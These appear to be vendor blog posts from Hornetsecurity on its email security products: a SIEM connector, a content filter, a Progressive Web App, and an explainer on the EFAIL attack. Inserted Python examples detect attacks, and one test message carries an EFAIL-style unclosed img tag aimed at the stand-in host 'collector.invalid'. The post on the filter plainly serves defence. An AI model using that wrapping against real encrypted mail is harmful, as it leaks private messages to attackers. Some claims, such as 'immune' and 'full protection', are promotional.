Hornetsecurity Services compatible with SIEM services thanks to new SIEM Connector


The IT infrastructures of companies are exposed to a variety of different threats – ranging from ransomware attacks to phishing waves, or bot attacks aimed at firewalls. To avoid becoming a victim of cyber attacks, complex defense mechanisms must be installed. SIEM services are an important component of this process. SIEM services bundle and analyze all security-relevant data at a central location, which allows suspicious activities to be detected early.

With the new Hornetsecurity SIEM Connector, Hornetsecurity now also offers an interface for SIEM services for its 365 Total Protection and Spam Filter Service products. The Connector automatically receives and imports e-mail log entries from the Hornetsecurity Cloud.


Data relating to IT security can be found in many different places in an organization – on end devices, servers, network devices, and special security infrastructure such as firewalls, antivirus or mail security systems. Security Information and Event Management (SIEM) services are software products that collect and analyze this information in real time at a central location. The programs derive patterns and trends from this information so that targeted cyber attacks with multiple attack vectors can be detected more quickly. Among the best-known SIEM services are IBM QRadar and Splunk.

The Hornetsecurity SIEM Connector

With the new Hornetsecurity SIEM Connector, users of SIEM services can have email log entries automatically read from the Hornetsecurity Cloud. The new product can be booked if the Hornetsecurity Spam Filter Service or 365 Total Protection (Business or Enterprise) is already in use.

The Hornetsecurity SIEM Connector sends detailed information by means of syslog packets containing the following details:

• General email information: Email subject, attachment file names, message ID from the header, encryption method used and size of the email.

• Processing information: date and time of first processing, classification and reason for classification and number of log entries for this email.

• Sender information: Source address from the SMTP dialog and sender as specified in the email header.

• Information about the recipient: Mailbox to which this email has been assigned by the Hornetsecurity Spamfilter service and recipient, as specified in the e-mail header.

Thanks to the connector, Hornetsecurity services can provide critical log data to SIEM services to provide comprehensive protection for the IT infrastructure.

Simple onboarding of the Hornetsecurity Services: Video tutorial for product training


Extortion, theft, drug trafficking – in times of digitalization, all these crimes are also committed online. Email communication plays a central role in this: it is considered the most popular means of communication in companies and at the same time the main entry vector for malware. Through social engineering, cybercriminals manipulate their victims in order to persuade them to click on links and open attachments containing ransomware and trojans, for example.

However, companies are not only facing the challenge of protecting email inboxes from misuse as a gateway for cyberattacks. Information and data communicated via email are also increasingly becoming a valuable digital resource in a cybercriminal environment. Managed Security Services offer comprehensive protection against increasing cybercrime without the installation of additional hardware or software. Every day, several new cyber threats emerge that seek their way into the system, so it is important to act quickly.

Hornetsecurity’s Email Security Services protect your email communications from the most sophisticated cyber attacks, annoying spam and malware. In order to offer customers the opportunity to familiarize themselves with the services in advance and to make the implementation of the products as easy as possible, Hornetsecurity extends its onboarding service with a training program in the form of YouTube videos. The activation of the services can thus be implemented as quickly and easily as possible directly by the user.

The trainings are organized in different playlists: The Spamfilter Basic Playlist provides information about the setup of Hornetsecurity’s Spam & Malware Protection and its different features. The Spamfilter Advanced I Playlist contains further information on the use of 365 Total Protection, Email archiving and the Signature & Disclaimer. The Spamfilter Advanced II Playlist provides users with useful information on Email encryption and Advanced Threat Protection.

The videos can be accessed at any time using the links below and provide customers all the information they need for onboarding.

Hornetsecurity mobile – on the move with the Progressive Web App


In recent years, the number of apps downloaded from app stores to mobile devices has steadily decreased. According to a forecast by the IT consulting firm Gartner, half of all apps used in 2020 will be Progressive Web Apps (PWA). Hornetsecurity reacted to this trend and released a Progressive Web App for the Hornetsecurity Control Panel.

A Progressive Web App is a combination of a responsive website and a native app. Since February 2019, a Progressive Web App has been available to all Hornetsecurity customers, enabling them to access the control panel from a mobile device in a simple way. Since the release of the control panel version at the end of June 2019, the Progressive Web App has also been available as a white label version with which Hornetsecurity customers and partners who have booked the white label option can customize the app name, icon and splash screen.

Advantages of the Progressive Web App from Hornetsecurity

With the Progressive Web App, it is possible to create an icon on the home screen, allowing easy access to the control panel. In comparison to a responsive website, the Control Panel does not have to be opened in a browser but is accessed directly by clicking on the icon. With the white label version, the icon, app name and logo on the splash screen can also be adapted to the company’s design.

Another advantage is that, unlike native apps, the Progressive Web App does not need to be downloaded and therefore does not consume any storage capacity on the mobile device. The Progressive Web App software also updates automatically. Furthermore, the use of the Progressive Web App saves time, as the user name and password can be saved and thus prevent the time-consuming, repeated input of user data.

So, if you want to access the control panel quickly and conveniently from home or on the train, install the Progressive Web App and benefit from better usability.

How to

1. Open the Internet browser on your smartphone and enter “cp.hornetsecurity.com” in the address bar.
2. At the bottom of your browser, a pop-up opens with the instructions for installing the Web App.
3. After installing the Web App on your home screen, open the app and log in with your login data.

CONTENT FILTER 2.0 – The security officer for your data transfer


The State Criminal Police Office of Lower Saxony is currently warning against an increase of emails with fraudulent application content. These emails are explicitly directed at companies with advertised vacancies and endanger in particular personnel departments that are involved in application processes. The serious-sounding emails carry alleged application documents attached in the form of archive files. If these files are unpacked, however, no application documents are revealed, but rather dangerous malware that infects the system.

Secure data transfer with Hornetsecurity’s Content Filter

With Hornetsecurity’s Content Filter, effective protection measures can be taken against unwanted file attachments. In addition to the general protection provided by the spam and virus filter, individual settings for attachments of incoming and outgoing emails can be made within the content filter. With the update to version 2.0, the content filter now also checks nested archives. Defined rules can still be applied for the entire domain or for certain user groups. This allows particularly vulnerable groups in the company to be deliberately protected against current attacks.

Easy setting – secure data transfer

The Content Filter makes managing email attachments uncomplicated. Unwanted file formats, such as executable files, are grouped under the collective term .executable and can be selected from a predefined list with just a few clicks the first time they are set up. Additional file formats that do not fall under one of the collective terms can be added if required. In addition, it is possible to individually configure the maximum permitted size for affected email attachments.

Fig. 1: Settings in the content filter for incoming emails

When a rule applies, one of two actions can be set for handling the affected email: block the email or cut the attachment. In addition, encrypted attachments, which are increasingly used in common formats such as PDF, ZIP, RAR etc., can be explicitly prohibited (Fig. 1). Furthermore, the content filter includes an automated comparison of file extensions with the supplied MIME type, which can differ significantly from the file extension in the case of suspicious email attachments. Archive files that have internal nesting structures in the form of additional archives are analyzed and evaluated down to the security-relevant level.
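The extension/MIME comparison, the nested-archive check and the encrypted-attachment rule described above can be sketched as follows. This is an added example, not Hornetsecurity's implementation; the extension lists, the depth limit and the sample message are assumptions constructed for illustration.

```python
import io
import os
import zipfile
from email.message import EmailMessage

# Both tables are policy values assumed for this example.
BLOCKED_EXT = {".exe", ".scr", ".js", ".vbs", ".bat"}
EXPECTED_MIME = {".pdf": {"application/pdf"},
                 ".zip": {"application/zip", "application/x-zip-compressed"}}

def scan_blob(path, data, depth=0, max_depth=5):
    """Findings for one file; ZIP content is scanned member by member."""
    findings = []
    if os.path.splitext(path)[1].lower() in BLOCKED_EXT:
        findings.append((path, "blocked extension"))
    if data[:4] != b"PK\x03\x04":          # not a ZIP: nothing to unpack
        return findings
    if depth >= max_depth:
        return findings + [(path, "nesting too deep")]
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings + [(path, "unreadable archive")]
    with zf:
        for info in zf.infolist():
            inner = f"{path}!{info.filename}"
            if info.flag_bits & 0x1:       # encrypted member, cannot inspect
                findings.append((inner, "encrypted member"))
            else:
                findings += scan_blob(inner, zf.read(info), depth + 1)
    return findings

def scan_message(msg):
    """Compare each attachment's extension with its declared MIME type."""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        allowed = EXPECTED_MIME.get(os.path.splitext(name)[1].lower())
        if allowed and part.get_content_type() not in allowed:
            findings.append((name, "extension/MIME mismatch"))
        findings += scan_blob(name, part.get_payload(decode=True) or b"")
    return findings

def build_sample():  # constructed message: ZIP in a ZIP plus a mislabelled "PDF"
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("cv.pdf.exe", b"placeholder bytes")
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("docs.zip", inner.getvalue())
    msg = EmailMessage()
    msg.set_content("Please find my application attached.")
    for data, sub, name in ((outer.getvalue(), "zip", "application.zip"),
                            (b"not a pdf", "x-msdownload", "cv.pdf")):
        msg.add_attachment(data, maintype="application", subtype=sub, filename=name)
    return msg
```

A production filter would also cap the uncompressed size of each member before reading it, since `zf.read()` inflates the whole member into memory.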
If the content filter intervenes and removes a suspicious attachment, it changes the original state of the message. For signed emails, active intervention by the content filter causes the signature to be corrupted. If this occurs, the content filter informs the recipient and specifies whether the signature was valid before the change (Fig. 2).

Fig. 2: Valid signature after truncating the content

However, if the certificate of the signed email is available on our systems, the email whose signature was broken by truncating the file attachment is re-signed and thus retains its validity.
The content filter can be activated for all Hornetsecurity partners and customers in addition to the spam and virus filter.

ATP – the interoperable complement for comprehensive protection

The current threat landscape of malware ranges from ransomware to cryptominers and is constantly changing. Spam, virus and content filters provide a solid basis against cyber attacks. These filters do not provide 100% protection against targeted and sophisticated attacks on companies. Further protection mechanisms are needed that adapt to the constantly changing types of attacks and malware. By combining Hornetsecurity’s interoperable filters, full protection against specific cyber attacks can be achieved and sustainably secured for companies.
In addition to the spam and virus filter, Advanced Threat Protection (ATP) from Hornetsecurity offers reliable protection against current malware attacks. ATP integrates seamlessly into the existing filters from Hornetsecurity email services and, in comparison to the content filter, performs in-depth behavior analyses of file contents. Thanks to the integrated ATP engines such as the sandbox, URL Rewriting and URL Scanning, attacks such as targeted or blended attacks are detected early and the necessary protective measures are initiated in real time. For example, hidden links infiltrated in files can be recursively tracked in an isolated environment and the content hidden within can be subjected to forensic analysis. For content patterns that indicate malicious intent, the company’s IT security team is notified in real time for immediate protection.

EFAIL: A vulnerability in the PGP and S/MIME encryption methods?


UPDATE from May 16, 2018:
In order to proactively protect our corporate customers, who are still encrypting and decrypting their emails via an in-house solution and have not yet booked the Hornetsecurity Encryption Service, from EFAIL, we have also developed a special filter level for attacks according to the EFAIL pattern. The only prerequisite for this is that their email communication runs via the Hornetsecurity servers, which is generally the case with our email security products.

The filter level is already activated by default for all our customers who have booked at least the Hornetsecurity spam filter service and. It protects not only against EFAIL, but also against future attacks with similar patterns.

+++++

A known vulnerability is transferred to the PGP and S/MIME protocols and takes email manipulation to a new level. No problem for Hornetsecurity.
On Monday, May 14, 2018, a team of security researchers from the University of Applied Sciences Münster, the Ruhr University Bochum and the University of Leuven (Belgium) published a paper that questions the security of the PGP and S/MIME encryption standards and thus attracts worldwide attention.
However, the vulnerabilities discovered (CVE-2017-17688 and CVE-2017-17689) do not affect the protocols themselves, but use an already known vulnerability to decrypt encrypted emails by the mail client and send them to the attacker.
A prerequisite for the execution of the attacks is that the attacker already possesses emails in encrypted form. To do this, the emails need to be intercepted during transport. The attacker must have previously executed a man-in-the-middle attack (MitM) or compromised a mail server to gain access to the emails passing through the attacker's position or the server. Only if these requirements are met can the attacker execute one of the EFAIL attacks described in the paper.
The authors of the paper present two similar attacking methods to decrypt emails with existing PGP or S/MIME encryption.
The first method is quite simple, but limited to certain email clients (Apple Mail, iOS Mail, Mozilla Thunderbird) and any third-party plug-ins installed there:
To do this, the attacker creates an email with three body parts. The first part formats the email as HTML and inserts an image tag with a target website. The quotation marks and the image tag are not closed. This is followed in the second body part by the PGP- or S/MIME-encrypted text. The third part consists of HTML formatting again and closes the image tag from part one.

(Source: EFAIL attacks, 14/05/04 )

If the attacker sends this email to the sender of the encrypted message, it is possible that the message is decrypted and transmitted to the stored website. To do this, the email client must be configured so that it automatically downloads external images without asking the user.
The second way to read PGP- or S/MIME-encrypted emails is a well-known method of extracting plain text from blocks of encrypted messages.
The attack scenarios are called CBC attack (S/MIME) and CFB attack (PGP). They determine a known text portion in an encrypted message and overwrite subsequent blocks with their own content. The EFAIL attack inserts an image tag with a target website into the encrypted text, as described in the first part. If the message is then delivered to the actual recipient of the encrypted message, it is possible that the message is decrypted and transmitted to the attacker.
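A gateway-side check for the three-part layout of the first method can look like the following added example, which is not Hornetsecurity's filter: it flags a multipart message in which an HTML part that ends inside an open attribute is followed by an encrypted part. The sample message is constructed, its ciphertext is a placeholder and `collector.invalid` is a reserved, non-resolving name.

```python
from email import message_from_string, policy

ENCRYPTED_TYPES = {"application/pkcs7-mime", "multipart/encrypted"}

def ends_inside_attribute(html):
    """True if the fragment stops inside a quoted attribute of an open tag."""
    in_tag, quote = False, None
    for ch in html:
        if quote:
            quote = None if ch == quote else quote
        elif in_tag and ch in "\"'":
            quote = ch
        elif in_tag and ch == ">":
            in_tag = False
        elif ch == "<":
            in_tag = True
    return quote is not None

def is_ciphertext(part):
    """S/MIME and PGP/MIME by content type, inline PGP by its armor header."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return (part.get_content_maintype() == "text"
            and "-----BEGIN PGP MESSAGE-----" in part.get_content())

def efail_wrapping(raw):
    """True if an HTML part with a dangling attribute precedes ciphertext."""
    msg = message_from_string(raw, policy=policy.default)
    for container in msg.walk():
        dangling = False
        for part in (container.iter_parts() if container.is_multipart() else ()):
            if is_ciphertext(part):
                if dangling:
                    return True
            elif part.get_content_type() == "text/html":
                dangling = ends_inside_attribute(part.get_content())
    return False

# Constructed sample following the three-part layout; ciphertext is a placeholder.
SAMPLE = """\
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.invalid/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--B
Content-Type: text/html

">
--B--
"""
```

The check only covers the multipart wrapping; the CBC and CFB variants modify the ciphertext itself and are not visible in the MIME structure.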

The emails encrypted by Hornetsecurity are protected by design against attacks of this kind, since Hornetsecurity does not even allow the different content types (multipart/mixed) required for the attack.
The encryption methods themselves – S/MIME and PGP – were not broken; rather, vulnerabilities were found in email clients for HTML emails that bypass these encryption techniques. In addition, we object to the recommendation of various security researchers to generally deactivate content encryption: PGP and S/MIME are still not per se more insecure than a pure transport-encrypted transmission or no encryption at all, even after this publication. Since the attack requires a MitM attack, i.e. a breaking of the possible transport encryption, generally abandoning content encryption would be fatal: Possible attackers could even read the email traffic directly like a postcard!
Hornetsecurity Encryption Service, which is immune to EFAIL, does not require any client plug-ins: Encryption and decryption are fully automated by Hornetsecurity in the cloud – no installation, maintenance or user interaction is required – simply secure!


Hornetsecurity signs first U.S. distributor deal


Value-added distributor Contronex includes Hornetsecurity’s Cloud Security Services in its portfolio

Hornetsecurity has closed its first VAD contract in the U.S. with Naples, FL based distributor Contronex. With this new partnership, Hornetsecurity will significantly expand its reach into the U.S. and Canada.

According to Oliver Dehning, CEO of Hornetsecurity: “With Contronex, we have found the perfect match. They are experienced in providing the best security solutions in the IT marketplace. Also, they offer an extensive network of resellers that are trained in selling high-class security products. We’re very happy to have established a relationship with this experienced partner.”

“As a growing value-added distributor of IT security software solutions, we regularly add new vendors to expand our product portfolio. With Hornetsecurity, the onboarding process was accomplished quicker than ever”, adds Beat Kramer, CEO at Contronex.

Hornetsecurity, a leading European Cloud Security Service provider, offers a full suite of Email Security Solutions protecting companies of all sizes from malware or phishing attacks and unauthorized access and loss of data, all without the need for extra hardware, software or administrative effort.

Founded in 1990 in Naples, FL, Contronex specializes in the distribution of IT security solutions and commits to three simple concepts: integrity, reliability and commitment to service, which aligns perfectly with the Hornetsecurity approach. Contronex has developed a unique partner program for resellers and managed service providers that helps them to purchase the products their clients need.